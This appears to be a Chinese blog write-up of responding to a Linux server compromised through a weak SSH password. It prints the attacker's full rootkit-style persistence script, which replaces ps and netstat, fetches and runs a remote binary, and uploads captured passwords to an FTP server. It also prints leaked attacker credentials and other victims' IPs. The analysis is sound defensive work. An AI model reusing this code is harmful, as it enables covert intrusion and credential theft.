某日哥们的负责的服务器因为SSH弱口令被黑了(又是边界安全意识的问题),看到异常的进程信息如下:
lsof看一下打开的文件,发现/dev/g下存在这些东西
然后习惯性的按照时间排序查看一下命令,因为root已经被拿了所以非常有可能已经修改了命令。然后看到ps和netstat都非常小,这太不正常了。
-rwxr-xr-x 1 root root 78 Apr 30 2016 /bin/netstat strings netstat #!/bin/sh for arg in "$*";do .Fnetstat $arg|grep -v "125.77.31.197";done;exit
发现其实执行的是Fnetstat
ps也被替换了,最终执行的Fps
root@localhost tmp]# strings /bin/ps #!/bin/sh for arg in "$*";do .Fps $arg|grep -v ".syslogd--system"|grep -v "a8137c40f9"|grep -v "ps"|grep -v "grep"|grep -v "nslookup"|grep -v "mail";done;exit
cron.hourly下的三个脚本mail.sh、mail.py、ssh_deny.sh
先来看ssh_deny.sh
/dev/black.txt记录的是SSH登录失败的IP及次数
pt是SSH的监听端口
脚本功能就是使用iptables封禁登录失败次数大于3次的IP
mail.py是一个发送邮件的脚本,会将/dev/1.txt发送出去。
从脚本中可以看到两个账号
user=’success501@163.com’,passwd=’ff1314′
还有一个qq邮箱995999349@qq.com
然后看mail.sh
#!/bin/bash S=`date +%s%N | md5sum | head -c 10` ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'` pt=`netstat -ntlp | awk '!a[$NF]++ && $NF~/sshd$/{sub (".*:","",$4);print $4}'` Add=`nslookup www.1024kbs.com|grep "Address: "|awk '{print $2}'` mv /dev/1.txt /dev/"$ip"+1+"$pt"+"$S".txt;mv /dev/2.txt /dev/"$ip"+2+"$pt"+"$S".txt curl -u root:ff1314 -T "{/dev/"$ip"+1+"$pt"+"$S".txt,/dev/"$ip"+2+"$pt"+"$S".txt}" ftp://$Add:888 rm -rf /dev/"$ip"+1+"$pt"+"$S".txt /dev/"$ip"+2+"$pt"+"$S".txt
可以看出是将/dev/1.txt和/dev/2.txt重命名后上传到FTP上,然后删除掉。估计这里被装了SSH后门,1.txt和2.txt就是记录密码的文件,不过SSH被哥们的同事重装了,这里看不出来了,然后登下FTP看看。登上FTP服务器发现在几个密码文件
ftp> open www.1024kbs.com 888 Connected to www.1024kbs.com (118.193.212.86). 220 Welcome to www.Gxnn.com FTP Server! Name (www.1024kbs.com:root): root 331 Password required for root Password: 230 User successfully logged in. Remote system type is Base. ftp> ls 227 Entering Passive Mode (118,193,212,86,4,88). 150 Opening ASCII mode data connection for directory list. -rwx------ 1 user group 7 Nov 18 11:52 116.211.17.5+1+22+426e95d58e.txt -rwx------ 1 user group 6 Nov 18 11:52 116.211.17.5+1+22+9ada1f5efb.txt -rwx------ 1 user group 32 Nov 18 14:48 116.211.17.5+1+22+b500d80263.txt -rwx------ 1 user group 7 Nov 18 11:52 116.211.17.5+2+22+426e95d58e.txt -rwx------ 1 user group 6 Nov 18 11:52 116.211.17.5+2+22+9ada1f5efb.txt -rwx------ 1 user group 50 Nov 18 14:55 221.229.164.18+1+22+8e46e6b7d4.txt 226 Transfer complete. ftp>
又是其他受害者的SSH信息。搜索是995999349看到一篇文章。http://blog.chinaunix.net/uid-25057421-id-5195167.html发现了攻击者的脚本。
#! /bin/bash #chkconfig:12345 90 90 ############################################# ############################################# ############################################# ############################################# ############################################# path=`pwd` exit0="exit 0" Fss="/usr/bin/.Fss" Fps="/usr/bin/.Fps" Fnet="/usr/bin/.Fnetstat" LockAngel="/usr/bin/zfgsr" Fssbak="/usr/bin/dpkgd/ss" Fpsbak="/usr/bin/dpkgd/ps" Fnetbak="/usr/bin/dpkgd/netstat" MyFileAngel="/etc/init.d/.dbus-daemon--system" PuppetAngel="/usr/bin/.dbus-daemon--system.bak" allow="/etc/allow.bak" Fconfig="/sbin/Fconfig.n" S99="/etc/rc.d/init.d/S99.25000" if [ ! -f "$Fconfig" ];then echo byqinshou 995999349 > $Fconfig zfgsr +ia $Fconfig >/dev/null 2>&1 fi Address1=`nslookup www.120kongbao.com|grep "Address: "|awk '{print $2}'` if [ -z "$Address1" ];then zfgsr -ia /etc/resolv.conf echo 'nameserver 114.114.114.114'>/etc/resolv.conf echo 'nameserver 8.8.8.8'>>/etc/resolv.conf touch -d "2010-06-7 08:10:30" /etc/resolv.conf zfgsr +ia /etc/resolv.conf fi Ftempbash=`cat $Fconfig | awk '{print $2}'` #现脚本文件名 Fbashtemp="/usr/bin/"$Ftempbash #现脚本路径 Fbashname=`date +%s%N | md5sum | head -c 10` Fbashpath="/usr/bin/"$Fbashname #新脚本路径 if [ $0 != "$Fbashtemp" ];then pkill $Ftempbash;killall $Ftempbash zfgsr -ia /usr/bin/$Ftempbash;rm -f /usr/bin/$Ftempbash zfgsr -ia $PuppetAngel;rm -f $PuppetAngel fi # ------------------------------------------------------------- if [ ! -f "$LockAngel" ];then zfgsr -ia $LockAngel rm -rf $LockAngel cp -f /usr/bin/chattr $LockAngel cp -f /usr/bin/chattr /usr/bin/.zfgsr cp -f /usr/bin/.zfgsr $LockAngel chmod 777 $LockAngel chmod 777 /usr/bin/.zfgsr touch -d "2011-06-7 08:10:30" $LockAngel touch -d "2011-06-7 08:10:30" /usr/bin/.zfgsr rm -rf /usr/bin/chattr zfgs +ia $LockAngel >/dev/null 2>&1 fi #删除原chattr命令,并复制chattr为/usr/bin/.zfgsr和/usr/bin/zfgsr /usr/bin/zfgsr添加ai属性,不可增删改 if [ -f /usr/sbin/ss ];then if [ ! -f "$Fss" ];then if [ ! -f "$Fssbak" ];then mkdir /usr/bin/dpkgd/ cp -f /usr/sbin/ss $Fssbak cp -f /usr/sbin/ss $Fss else cp -f $Fssbak $Fss fi zfgsr -ia /usr/sbin/ss rm -rf /usr/sbin/ss echo '#!/bin/sh' > /usr/sbin/ss echo '.Fss|grep -v "'$Address1'"' >> /usr/sbin/ss echo 'exit' >> /usr/sbin/ss chmod 0755 $Fss;chmod 0755 /usr/sbin/ss zfgsr +ia /usr/sbin/ss >/dev/null 2>&1 zfgsr +ia $Fssbak >/dev/null 2>&1 zfgsr +ia $Fss >/dev/null 2>&1 fi fi #修改ss命令 if [ -f /bin/netstat ];then if [ ! -f "$Fnet" ];then if [ ! -f "$Fnetbak" ];then mkdir /usr/bin/dpkgd/ cp -f /bin/netstat $Fnetbak cp -f /bin/netstat $Fnet else cp -f $Fnetbak $Fnet fi zfgsr -ia /bin/netstat rm -rf /bin/netstat echo '#!/bin/sh' > /bin/netstat echo 'for arg in "$*";do' >> /bin/netstat echo '.Fnetstat $arg|grep -v "'$Address1'";done;exit' >> /bin/netstat chmod 0755 $Fnet;chmod 0755 /bin/netstat zfgsr +ia /bin/netstat >/dev/null 2>&1 zfgsr +ia $Fnetbak >/dev/null 2>&1 zfgsr +ia $Fnet >/dev/null 2>&1 fi fi #修改netstat if [ -f /bin/ps ];then if [ ! -f "$Fps" ];then if [ ! -f "$Fpsbak" ];then mkdir /usr/bin/dpkgd/ cp -f /bin/ps $Fpsbak cp -f /bin/ps $Fps else cp -f $Fpsbak $Fps fi zfgsr -ia /bin/ps rm -rf /bin/ps echo '#!/bin/sh' > /bin/ps;echo 'for arg in "$*";do' >> /bin/ps echo '.Fps $arg|grep -v "'.dbus-daemon--system'"|grep -v "'$Fbashname'"|grep -v "ps"|grep -v "grep";done;exit' >> /bin/ps chmod 0755 $Fps;chmod 0755 /bin/ps zfgsr +ia /bin/ps >/dev/null 2>&1 zfgsr +ia $Fpsbak >/dev/null 2>&1 zfgsr +ia $Fps >/dev/null 2>&1 fi fi #修改ps命令,屏蔽了ps、grep等显示 if [ ! -f "$allow" ];then cp -f /etc/hosts.allow $allow zfgsr +ia $allow >/dev/null 2>&1 fi # by qinshou ----------------------------------------------- ExistAngel=`.Fps aux | grep .dbus-daemon--system | grep -v "grep" |wc -l` if [ $ExistAngel != 1 ];then zfgsr -ia /usr/bin/.dbus-daemon--system rm -rf /usr/bin/.dbus-daemon--system cp -f /usr/bin/.dbus-daemon--system.bak /usr/bin/.dbus-daemon--system chmod 777 /usr/bin/.dbus-daemon--system /usr/bin/.dbus-daemon--system rm -rf /usr/bin/.dbus-daemon--system fi if [ ! -f "$MyFileAngel" ];then zfgs -i /usr/bin/wget zfgs -a /usr/bin/wget chmod 777 /usr/bin/wget wget -P /etc/ http://www.120kongbao.com:999/1000.exe zfgs -i $MyFileAngel zfgs -a $MyFileAngel rm -rf $MyFileAngel chmod 777 /etc/1000.exe mv -f /etc/1000.exe $MyFileAngel zfgs +i $MyFileAngel zfgs +a $MyFileAngel chmod 0 /usr/bin/wget zfgs +i /usr/bin/wget zfgs +a /usr/bin/wget fi if [ ! -f "$PuppetAngel" ];then cp -f $MyFileAngel $PuppetAngel zfgs +i $PuppetAngel zfgs +a $PuppetAngel fi iptable=`iptables -L INPUT|grep $Address1|awk '{print $1 $4}'` if [ -z "$iptable" ];then iptables -I INPUT -s $Address1 -j ACCEPT else iptables -D INPUT -s $Address1 -j DROP fi # 自启动------------------ if [ ! -f "$S99" ];then echo "#!/bin/sh" >> $S99 echo "# chkconfig: 12345 90 90" >> $S99 echo "# description: $Ftempbash" >> $S99 echo "### BEGIN INIT INFO" >> $S99 echo "# Provides: $Ftempbash" >> $S99 echo "# Required-Start: " >> $S99 echo "# Required-Stop: " >> $S99 echo "# Default-Start: 1 2 3 4 5" >> $S99 echo "# Default-Stop: " >> $S99 echo "# Short-Description: $Ftempbash" >> $S99 echo "### END INIT INFO" >> $S99 echo 'case $1 in' >> $S99 echo "start)" >> $S99 echo " $Fbashpath" >> $S99 echo " ;;" >> $S99 echo "stop)" >> $S99 echo " ;;" >> $S99 echo "*)" >> $S99 echo " $Fbashpath" >> $S99 echo " ;;" >> $S99 echo "esac" >> $S99 fi # by qinshou ----------------------------------------------- zfgsr -ia $Fconfig;zfgsr -ia $0;zfgsr -ia $Fbashpath sed -i "s|$Ftempbash|$Fbashname|" $Fconfig zfgsr +ia $Fconfig >/dev/null 2>&1 cp -f $0 $Fbashpath;rm -f $0;chmod 0755 $Fbashpath # by qinshou ----------------------------------------------- if [ -z "`$S99|grep "$Fbashtemp"`" ]; then sed -i "s|$Ftempbash|$Fbashname|" $S99 chmod 777 $S99 fi # by qinshou ----------------------------------------------- zfgsr -ia /usr/bin/chattr;rm -f /usr/bin/chattr zfgsr -ia /etc/hosts.allow;cp -f $allow /etc/hosts.allow;zfgsr +ia /etc/hosts.allow >/dev/null 2>&1 sleep 1;zfgsr -ia $Fbashpath;chmod 0755 $Fbashpath;nohup $Fbashpath >/dev/null 2>&1 & # by qinshou ----------------------------------------------- zfgsr -ia /bin/ps;sed -i "s|$Ftempbash|$Fbashname|" /bin/ps zfgsr -ia /bin/netstat;chmod 0755 /bin/netstat;chmod 0755 /bin/ps zfgsr +ia /bin/netstat >/dev/null 2>&1 zfgsr +ia /bin/ps >/dev/null 2>&1 # by qinshou ----------------------------------------------- exit
版权信息:8090社团>>帮朋友Linux应急记录
本文链接:https://www.8090st.com/server-ssh-weak-password.html 转载请注明出处.
如果喜欢:点此订阅本站
相关文章
为您推荐
各种观点